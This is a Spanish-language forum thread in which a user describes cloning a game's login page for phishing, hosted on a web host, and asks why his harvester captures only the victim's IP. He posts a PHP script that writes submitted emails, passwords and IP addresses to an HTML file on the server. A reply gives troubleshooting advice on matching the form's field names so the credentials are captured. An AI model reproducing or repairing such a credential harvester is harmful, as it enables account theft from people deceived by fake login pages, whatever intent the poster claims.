experimento de phishig fallido

Iniciado por XxELIT3xX, 9 Enero 2015, 23:33 PM

0 Miembros y 1 Visitante están viendo este tema.

XxELIT3xX

 Hola a todos amigos, este es mi primer post en este foro, aunque os llevo leyendo desde hace mucho tiempo pero hoy he decidido lanzarme a preguntar una pregunta.
Resulta que mi amigo y yo decidimos hacerle una broma a otro amigo, pero investigando nos topamos con eso del phishing e investigamos.Una vez sabiamos que era eso decidimos ponerlo en practica para saber si era cierto que existia una forma do clonar una pagina de una forma tan real, lo probamos entre nosotros en un JUEGO cosa que supongo que si lo hacemos con el consentimiento de los 2 no ocurre nada...
bueno pues, una vez teniamos el index.html y el post.php o login.php (el nombre cambiaba porque probabamos con todos los php que veiamos de videos de como hacer phishing en facebook sin hacerlo a facebook, solo cogiendo el php para luego usarlo hacioendo el phishing entre nosotros con la pagina del juego)el php que tenemso actualmente crea un archivo html (passw0rds14.html) en el servidor que podemos ver.bueno, hosteamos el server en hostinger, lo subimos con filezilla, lo poniamos en practica pero no cogia los datos...
lo que cogia era la ip solo, dejando esta secuencia:

Email: [] Password: [] IP: [XX.XXX.XXXXXX]

la IP si que me la registra (la tapo porque es la del ordenador de mi amigo jejej)
pero luego me fije en algo... el php que cogimos de videos de hacer phishing a facebook tenia la siguiente secuencia:

Código (php) [Seleccionar]
<?php

$habbo 
$_POST['email']; 

$password $_POST['pass'];

$ip $_SERVER['REMOTE_ADDR']; 

$f fopen("passw0rds14.html""a"); 

fwrite ($f'Email: [<b><font color="#0000FF">'.$habbo.'</font></b>] Password: [<b><font color="#FF0040">'.$password.'</font></b>] IP: [<b><font color="#FE2EF7">'.$ip.'</font></b>]<br>');

fclose($f);




SIN ESPACIOS (no se si tendra algo que ver, pero yo aclaro...)
bueno, si os fijais tiene

Código (php) [Seleccionar]
$habbo = $_POST['email'];

$password = $_POST['pass'];

$ip = $_SERVER['REMOTE_ADDR'];


que seria para captar el email, la pass, y la ip.
pero el juego lo que pide para loguearse es USER, no email... asi que no se si
$habbo = $_POST['email'];  es lo que falla ahi... pero de todas formas solo falla eso, la contraseña si que me la pide el juego, sin embargo el php tampoco me capta la pass...

¿es $habbo = $_POST['email'];  lo que esta fallando?  :huh:
PD:si, he editado el index.html cambiando lo siguient de las palabras action y he puesto el login/post.php

ayudenme pls

insisto que no es con fines malos, de hecho creo que voy a empezar en esto del hacking etico creo que se llama, ya que me ha llamado muchisimo la atencion como existen este tipo de paginas fraudulentas tan... EXACTAS a las deverdad.

FELIZ AÑO NUEVOOOO JEJEJEJ  :rolleyes:


engel lex

Modifiqué el post, por favor cuando publiques codigo, usa las etiquetas GeSHi

eso no se hace a ciegas... necesitas ver el form que hace el post en el primer html para saber que dato capturar de los pasados...
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

tywors